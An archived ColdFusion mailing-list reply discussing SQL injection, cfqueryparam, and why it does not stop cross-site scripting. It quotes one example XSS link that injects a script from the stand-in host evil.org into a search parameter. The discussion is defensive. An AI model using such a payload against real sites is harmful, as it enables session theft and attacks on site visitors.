On 8/24/06, Dave Watts <[EMAIL PROTECTED]> wrote: > > > More evil is stuff like: > > > > <A HREF="http://trusted.org/search.cgi?criteria=<SCRIPT > > SRC='http://evil.org/badkama.js' ... > > I don't know what you mean by "more evil", but generally speaking SQL > injection attacks are considered to be a more serious problem than > cross-site scripting attacks. Fortunately, though, it's quite easy to > prevent them entirely - it's not so easy to prevent cross-site scripting > attacks.
I guess "more evil" by it's easier to catch "SQL injection" than "injection". > I've always hated cfqueryparaming everything, or generally > > hand-coding any database CRUD. > > You don't need to "hand-code database CRUD" to use CFQUERYPARAM. There's > really no excuse for not using it. Even the Dreamweaver 8 code-generation > wizards generate CFQUERYPARAM tags. Clarification: I use cfqueryparam in my DAO (it is a Data[base] Access Object, but most folks seem to think hard-coded getters and setters (or at least I do) when they think DAO, and mine's is all done in one function, for all tables). I meant it's a pain to maintain SQL all over the place, (or even many places in one place, if that makes sense), vs. a single facade of sorts. Thus you add cfqueryparam in one place, and you're done. Conversely, you add XSS "counter-scripts" in one place, vs. many. > A link for stuff cfqueryparam might not catch (with examples): > > http://www.technicalinfo.net/papers/CSS.html > > No, CFQUERYPARAM won't catch cross-site scripting exploits. It's not > intended to do that. It does, however, guarantee prevention of SQL > injection > exploits. Yeah, the main idea being that for a while I figured cfqueryparam was enough, now it's dawning that there is a whole world of injection out there besides the SQL kind. Just as dangerous, I reckon. Or maybe not. It is pretty cool to have the DB server call you back... plain stealing data pales in comparison. 8-] :DeN ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~| Introducing the Fusion Authority Quarterly Update. 80 pages of hard-hitting, up-to-date ColdFusion information by your peers, delivered to your door four times a year. http://www.fusionauthority.com/quarterly Archive: http://www.houseoffusion.com/groups/CF-Talk/message.cfm/messageid:251000 Subscription: http://www.houseoffusion.com/groups/CF-Talk/subscribe.cfm Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=11502.10531.4
